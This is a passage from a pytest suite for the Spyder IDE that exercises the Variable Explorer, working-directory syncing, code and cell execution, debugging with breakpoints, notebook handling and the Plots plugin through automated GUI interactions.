    shell.execute('quit()')
    python_shell.execute('quit()')
    qtbot.wait(1000)
    # Make sure everything quit properly
    assert not km.is_alive()
    assert not spykm.is_alive()
    # Close the channels
    spykc.stop_channels()
    kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
    """Test that variable types can't be changed in the Variable Explorer."""
    # Define an int in the console.
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Start editing its value in the Variable Explorer.
    main_window.variableexplorer.change_visibility(True)
    namespace_browser = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(
        lambda: namespace_browser.editor.source_model.rowCount() > 0,
        timeout=EVAL_TIMEOUT)
    namespace_browser.editor.setFocus()
    namespace_browser.editor.edit_item()

    # Try to replace the int with a string.
    qtbot.keyClicks(QApplication.focusWidget(), "'s'")
    qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
    qtbot.wait(1000)

    # The type change must have been rejected.
    assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
        main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and File Explorer when
    changing cwd in the IPython console.
    """
    wdir = main_window.workingdirectory
    treewidget = main_window.explorer.get_widget().treewidget
    shell = main_window.ipyconsole.get_current_shellwidget()

    # Wait until the window is fully up
    qtbot.waitUntil(
        lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Change to a freshly created directory with the %cd magic.
    new_wdir = str(tmpdir.mkdir(test_directory))
    with qtbot.waitSignal(shell.executed):
        shell.execute(u"%cd {}".format(new_wdir))
    qtbot.wait(1000)

    # Both the working-directory plugin and the File Explorer must now
    # point at the new directory.
    expected = osp.normpath(new_wdir)
    assert osp.normpath(wdir.get_container().history[-1]) == expected
    assert osp.normpath(treewidget.get_current_folder()) == expected
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and IPython console when
    changing directories in the File Explorer.
    """
    wdir = main_window.workingdirectory
    explorer = main_window.explorer
    shell = main_window.ipyconsole.get_current_shellwidget()

    # Wait until the window is fully up
    qtbot.waitUntil(
        lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Create temp directory (parametrized to also exercise non-ascii names)
    temp_dir = to_text_string(tmpdir.mkdir(test_directory))

    # Change directory in the explorer widget
    explorer.chdir(temp_dir)
    qtbot.wait(1000)

    # Assert that cwd changed in the Working directory plugin
    assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
        temp_dir)

    # Assert that cwd changed in the IPython console
    assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    (os.name == 'nt' or sys.platform == 'darwin' or
     parse_version(ipy_release.version) == parse_version('7.11.0')),
    reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
    """Test all the different ways we have to run Cython code"""
    # ---- Setup ----
    # Get a reference to the code editor widget
    code_editor = main_window.editor.get_focus_widget()

    # ---- Run pyx file ----
    # Load test file
    main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))

    # Run file with F5
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # Wait until an object appears (compilation takes a while, hence the
    # longer timeout)
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result: pyx_script computes 10!
    shell = main_window.ipyconsole.get_current_shellwidget()
    assert shell.get_value('a') == 3628800

    # Reset and close file
    reset_run_code(qtbot, shell, code_editor, nsb)
    main_window.editor.close_file()

    # ---- Import pyx file ----
    # Load test file that imports the compiled pyx module
    main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))

    # Run file
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('b') == 3628800

    # Close file
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
    """Test that notebooks are open from the Project explorer."""
    projects = main_window.projects
    projects.toggle_view_action.setChecked(True)
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Copy the test notebook into the project dir
    nb = osp.join(LOCATION, 'notebook.ipynb')
    shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select notebook in the project explorer
    idx = projects.get_widget().treewidget.get_index(
        osp.join(project_dir, 'notebook.ipynb'))
    projects.get_widget().treewidget.setCurrentIndex(idx)

    # Press Enter there to open it
    qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)

    # Assert that notebook was open
    assert 'notebook.ipynb' in editorstack.get_current_filename()

    # Convert notebook to a Python file
    projects.get_widget().treewidget.convert_notebook(
        osp.join(project_dir, 'notebook.ipynb'))

    # Assert the converted file was opened as a new untitled file
    assert 'untitled' in editorstack.get_current_filename()

    # Assert its contents are the expected ones.
    # Note: use parse_version for the comparison; a plain string compare
    # is lexicographic and would misorder versions such as '10.0' < '5.4.0'.
    file_text = editorstack.get_current_editor().toPlainText()
    if parse_version(nbconvert.__version__) >= parse_version('5.4.0'):
        expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
                         '\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
    else:
        expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
    assert file_text == expected_text

    # Close project
    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
    """Test that file are run from the Project explorer."""
    projects = main_window.projects
    projects.toggle_view_action.setChecked(True)
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Copy the test script into the project dir
    test_file = osp.join(LOCATION, 'script.py')
    shutil.copy(test_file, osp.join(project_dir, 'script.py'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select file in the project explorer
    idx = projects.get_widget().treewidget.get_index(
        osp.join(project_dir, 'script.py'))
    projects.get_widget().treewidget.setCurrentIndex(idx)

    # Press Enter there to open the file
    qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)

    # Assert that the file was open
    assert 'script.py' in editorstack.get_current_filename()

    # Run Python file from the project explorer
    projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')])

    # Wait until the new console is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Wait until all objects have appeared in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Check variables value (the four objects defined by script.py)
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # Close project
    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
    """Test that new breakpoints are set in the IPython console."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Clear all breakpoints so the session starts clean
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button to start a debugging session
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Set a breakpoint on line 6 while the debugger is already running
    code_editor = main_window.editor.get_focus_widget()
    code_editor.debugger.toogle_breakpoint(line_number=6)

    # Verify that the breakpoint was registered by Pdb ('b' lists them)
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!b")
    assert "1   breakpoint   keep yes   at {}:6".format(test_file) in control.toPlainText()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
    """Test all the different ways we have to run code"""
    # ---- Setup ----
    # Use a path with quotes and non-ascii chars to also exercise escaping
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run lines ----
    # Run the whole file line by line with F9
    for _ in range(code_editor.blockCount()):
        qtbot.keyClick(code_editor, Qt.Key_F9)
        qtbot.wait(200)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell and advance ----
    # Run the five cells present in file
    # Add an unnamed cell at the top of the file
    qtbot.keyClicks(code_editor, 'a = 10')
    qtbot.keyClick(code_editor, Qt.Key_Return)
    qtbot.keyClick(code_editor, Qt.Key_Up)
    for _ in range(5):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # Check for errors and the runcell function
    assert 'runcell' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()
    control_text = shell._control.toPlainText()

    # Rerun the last cell from the console history (Up + Shift+Enter)
    shell.setFocus()
    qtbot.keyClick(shell._control, Qt.Key_Up)
    qtbot.wait(500)
    qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    code_editor.setFocus()

    assert control_text != shell._control.toPlainText()
    # Only inspect the text produced by the rerun
    control_text = shell._control.toPlainText()[len(control_text):]

    # Check for errors and the runcell function
    assert 'runcell' in control_text
    assert 'Error' not in control_text

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell ----
    # Run the first cell in file (Ctrl+Enter; Cmd+Enter on macOS)
    modifier = Qt.ControlModifier
    if sys.platform == 'darwin':
        modifier = Qt.MetaModifier
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10

    # Press Ctrl+Enter a second time to verify that we're *not* advancing
    # to the next cell
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
    assert nsb.editor.source_model.rowCount() == 1

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Debug cell ------
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.AltModifier | Qt.ShiftModifier)
    # Continue past the cell's breakpoint
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Re-run last cell ----
    # Run the first three cells in file
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)

    # Wait until objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
                    timeout=EVAL_TIMEOUT)

    # Clean namespace
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')

    # Wait until there are no objects in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)

    # Re-run last cell (Alt+Enter); only its variable should come back
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    assert shell.get_value('li') == [1, 2, 3]

    # ---- Closing test file ----
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
                         [{'spy_config': ('editor', 'run_cell_copy', True)}],
                         indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
    """Test all the different ways we have to run code"""
    # ---- Setup ----
    # Use a path with quotes and non-ascii chars to also exercise escaping
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Make sure run_cell_copy is properly set in every editorstack
    for editorstack in main_window.editor.editorstacks:
        editorstack.set_run_cell_copy(True)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run cell and advance ----
    # Run the cells present in file
    for _ in range(4):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # With run_cell_copy the cell's source is pasted into the console
    # instead of going through the runcell machinery
    assert 'runcell' not in shell._control.toPlainText()
    assert 'a = 10' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # ---- Closing test file and reset config ----
    main_window.editor.close_file()
    CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(running_in_ci(), reason="Fails on CIs")
def test_open_files_in_new_editor_window(main_window, qtbot):
    """
    This tests that opening files in a new editor window
    is working as expected.

    Test for spyder-ide/spyder#4085.
    """
    # Set a timer to manipulate the open dialog while it's running,
    # since editor.load() below blocks on that modal dialog
    QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
                                                        'script.py',
                                                        directory=LOCATION))

    # Create a new editor window
    # Note: editor.load() uses the current editorstack by default
    main_window.editor.create_new_window()
    main_window.editor.load()

    # Perform the test
    # Note: There's always one file open in the Editor, so opening
    # script.py should bring the count to two
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
    """Test closing spyder when there is a file with modifications open."""
    # The console must be fully started before touching the editor
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Open a test file and mark its document as having unsaved changes
    main_window.editor.load(osp.join(LOCATION, 'script.py'))
    current_stack = main_window.editor.get_current_editorstack()
    current_stack.get_current_editor().document().setModified(True)

    # Give a potential segfault time to happen before teardown closes
    # the window with the modified file still open
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
    """Test that the maximize button is working correctly."""
    # Give focus to the Editor so it is the plugin that gets maximized
    main_window.editor.get_focus_widget().setFocus()

    # Resolve the toolbar button behind the maximize action
    maximize_action = main_window.layouts.maximize_action
    maximize_button = main_window.main_toolbar.widgetForAction(maximize_action)

    # A first click maximizes the Editor...
    qtbot.mouseClick(maximize_button, Qt.LeftButton)
    assert main_window.editor._ismaximized

    # ...and a second click restores it again
    qtbot.mouseClick(maximize_button, Qt.LeftButton)
    assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt' or
    (running_in_ci() and
     parse_version(PYQT_VERSION) >= parse_version('5.9')),
    reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
    """
    Test for a segfault when these steps are followed:

    1. Open an object present in the Variable Explorer (e.g. a list).
    2. Delete that object in its corresponding console while its
       editor is still open.
    3. Closing that editor by pressing its *Ok* button.
    """
    # Note on the skipif above: the version check must go through
    # parse_version. A plain string compare ('5.15' >= '5.9') is
    # lexicographic and evaluates to False for PyQt 5.10-5.15, so the
    # skip would not fire exactly where it is needed.

    # Create the object
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('myobj = [1, 2, 3]')

    # Open editor associated with that object and get a reference to it
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()
    obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
    obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']

    # Move to the IPython console and delete that object
    main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
    with qtbot.waitSignal(shell.executed):
        shell.execute('del myobj')
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)

    # Close editor
    ok_widget = obj_editor.btn_close
    qtbot.mouseClick(ok_widget, Qt.LeftButton)

    # Wait for the segfault
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
    """
    Test for errors when editing inline values in the Variable Explorer
    and then moving to another plugin.

    Note: Errors for this test don't appear related to it but instead they
    are shown down the road. That's because they are generated by an
    async C++ RuntimeError.
    """
    # Create an object in the console namespace
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Start an inline edit of that object in the Variable Explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()

    # Change focus to IPython console while the inline editor is open
    main_window.ipyconsole.get_widget().get_focus_widget().setFocus()

    # Wait for the error (if any) to surface
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
    """Test that c and n Pdb commands update the Variable Explorer.

    Debugs script.py with a breakpoint on line 6 and checks that each
    continue/next command makes one more object appear in the Variable
    Explorer, i.e. the namespace view is refreshed after every Pdb step.
    """
    nsb = main_window.variableexplorer.current_widget()

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    def type_pdb_command(command):
        # Type a Pdb command in the console and wait for it to execute.
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, command)
            qtbot.keyClick(control, Qt.Key_Enter)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Set a breakpoint
    code_editor = main_window.editor.get_focus_widget()
    code_editor.debugger.toogle_breakpoint(line_number=6)
    qtbot.wait(500)

    # Verify that c works
    type_pdb_command('!c')
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 1)

    # Verify that n works
    type_pdb_command('!n')
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 2)

    # Verify that it doesn't go to sitecustomize.py with next and stops
    # the debugging session.
    type_pdb_command('!n')
    type_pdb_command('!n')
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 3)

    type_pdb_command('!n')
    type_pdb_command('!n')
    type_pdb_command('!n')

    # Assert that the regular prompt appears, i.e. the session ended
    shell.clear_console()
    assert 'In [2]:' in control.toPlainText()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
    """Test that we correctly stop a debugging session."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button to start a debugging session
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Move to the next line
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!n")

    # Stop debugging through the corresponding toolbar button
    stop_debug_action = main_window.debug_toolbar_actions[5]
    stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(stop_debug_button, Qt.LeftButton)

    # Assert there are only two ipdb prompts in the console, i.e. no
    # extra prompt was generated by stopping the session
    assert shell._control.toPlainText().count('IPdb') == 2

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
    """
    Test that using the Working directory toolbar is working while debugging.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Load test file to be able to enter in debugging mode
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    control.setFocus()

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Set the temp dir as cwd through the Working directory plugin
    # while the debugger is active
    main_window.workingdirectory.chdir(tempfile.gettempdir())
    qtbot.wait(1000)
    shell.clear_console()
    qtbot.wait(500)

    # Get cwd in console
    qtbot.keyClicks(control, 'import os; os.getcwd()')
    qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.wait(1000)

    # Assert cwd is the one set through the plugin
    assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
    """Test that %varexp is working while debugging."""
    nsb = main_window.variableexplorer.current_widget()

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Load test file to be able to enter in debugging mode
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    control.setFocus()

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Step with 'n' until an object that can be plotted ('li') exists
    for _ in range(3):
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!n')
            qtbot.keyClick(control, Qt.Key_Enter)

    # Generate the plot from the Variable Explorer
    nsb.editor.plot('li', 'plot')
    qtbot.wait(1000)

    # Assert that there's a plot in the console
    assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
    'main_window',
    [{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
     {'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
    indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
    """
    Test that plots generated in the IPython console are properly displayed
    in the plots plugin.

    Parametrized over the two inline figure formats (png and svg).
    """
    assert CONF.get('plots', 'mute_inline_plotting') is False
    shell = main_window.ipyconsole.get_current_shellwidget()
    figbrowser = main_window.plots.current_widget()

    # Wait until the window is fully up.
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Generate a plot inline.
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig = plt.plot([1, 2, 3, 4], '.')\n"))

    # The figure canvas format must match the configured inline format
    if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
        assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
    else:
        assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'

    # Get the image name from the html, fetch the image from the shell, and
    # save it as a png.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)

    ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
    ipython_qimg = shell._get_image(img_name)
    ipython_qimg.save(ipython_figname)

    # Save the image with the Plots plugin as a png, mocking out the
    # file dialog so no GUI interaction is needed.
    plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
    mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
                 return_value=(plots_figname, '.png'))
    figbrowser.save_figure()

